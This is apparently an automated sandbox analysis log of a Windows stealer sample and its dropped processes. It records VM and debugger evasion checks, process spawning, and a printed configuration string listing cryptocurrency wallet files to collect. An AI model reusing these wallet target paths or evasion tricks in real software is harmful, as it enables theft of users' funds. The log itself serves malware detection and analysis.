                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Hyper-V (guest)
                        Source: Amcache.hve.3.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: Amcache.hve.3.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 10 Microsoft Hyper-V Server
                        Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin`
                        Source: Amcache.hve.3.drBinary or memory string: \driver\vmci,\driver\pci
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.000000000081C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ~VirtualMachineTypes
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.000000000081C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ]DLL_Loader_VirtualMachine
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2016 Microsoft Hyper-V Server
                        Source: file.exe, 00000000.00000002.1818332466.000000000081C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 11 Server Standard without Hyper-V
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: )Windows 8 Server Standard without Hyper-V
                        Source: JJEGIJEGDB.exe, 00000005.00000002.1884071590.0000000000BF4000.00000040.00000001.01000000.00000009.sdmp, explorti.exe, 00000008.00000002.1915451030.0000000000374000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 00000009.00000002.1923451902.0000000000374000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000C.00000002.2879169501.0000000000374000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: %Windows 2012 Microsoft Hyper-V Server
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Hyper-V
                        Source: Amcache.hve.3.drBinary or memory string: VMware
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: $Windows 8.1 Microsoft Hyper-V Server
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ,Windows 2012 Server Standard without Hyper-V
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2012 Microsoft Hyper-V Server
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
                        Source: Amcache.hve.3.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 10 Essential Server Solutions without Hyper-V
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 8 Essential Server Solutions without Hyper-V
                        Source: file.exe, 00000000.00000002.1822925903.000000000134B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000C.00000002.2879968817.00000000014FC000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000C.00000002.2879968817.0000000001529000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 10 Server Standard without Hyper-V (core)
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
                        Source: Amcache.hve.3.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: %Windows 2016 Microsoft Hyper-V Server
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: +Windows 8.1 Server Standard without Hyper-V
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2016 Server Standard without Hyper-V
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
                        Source: Amcache.hve.3.drBinary or memory string: VMware20,1
                        Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Generation Counter
                        Source: Amcache.hve.3.drBinary or memory string: NECVMWar VMware SATA CD00
                        Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                        Source: file.exe, 00000000.00000002.1822925903.0000000001324000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
                        Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                        Source: Amcache.hve.3.drBinary or memory string: VMware VMCI Bus Device
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
                        Source: Amcache.hve.3.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2016 Server Standard without Hyper-V (core)
                        Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 8 Server Standard without Hyper-V (core)
                        Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
                        Source: Amcache.hve.3.drBinary or memory string: VMware20,1hbin@
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: xVBoxService.exe
                        Source: Amcache.hve.3.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
                        Source: Amcache.hve.3.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: *Windows 11 Server Standard without Hyper-V
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ,Windows 2016 Server Standard without Hyper-V
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2012 Server Standard without Hyper-V (core)
                        Source: Amcache.hve.3.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VBoxService.exe
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 8.1 Server Standard without Hyper-V
                        Source: Amcache.hve.3.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: *Windows 10 Server Standard without Hyper-V
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VMWare
                        Source: Amcache.hve.3.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: #Windows 11 Microsoft Hyper-V Server
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSystem information queried: ModuleInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                        Anti Debugging

                        barindex
                        Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: regmonclass
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: gbdyllo
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: procmon_window_class
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: ollydbg
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: filemonclass
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: NTICE
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: SICE
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: SIWVID
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeCode function: 5_2_053E0B7A rdtsc 5_2_053E0B7A
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C655FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,0_2_6C655FF0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C65C410 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_6C65C410
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 12_2_001C643B mov eax, dword ptr fs:[00000030h]12_2_001C643B
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 12_2_001CA1A2 mov eax, dword ptr fs:[00000030h]12_2_001CA1A2
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C62B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6C62B66C
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C62B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6C62B1F7
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\KJJJJDHIDB.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe "C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C62B341 cpuid 0_2_6C62B341
                        Source: C:\Users\user\Desktop\file.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C5F35A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp,0_2_6C5F35A0
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 12_2_00196590 LookupAccountNameA,12_2_00196590
                        Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                        Source: Amcache.hve.3.drBinary or memory string: msmpeng.exe
                        Source: Amcache.hve.3.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                        Source: Amcache.hve.3.drBinary or memory string: MsMpEng.exe

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 5.2.JJEGIJEGDB.exe.a10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.explorti.exe.190000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.explorti.exe.190000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.explorti.exe.190000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000005.00000003.1835353412.00000000051C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000003.1883081687.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1923368430.0000000000191000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1915365040.0000000000191000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.1883984397.0000000000A11000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000003.1875084748.0000000005230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000003.2284671985.0000000005260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.2879009091.0000000000191000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0.2.file.exe.4b0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1818332466.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1822925903.0000000001324000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: file.exe PID: 6436, type: MEMORYSTR
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 0.2.file.exe.4b0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1818332466.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: file.exe PID: 6436, type: MEMORYSTR
                        Source: file.exe, 00000000.00000002.1818332466.0000000000556000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda 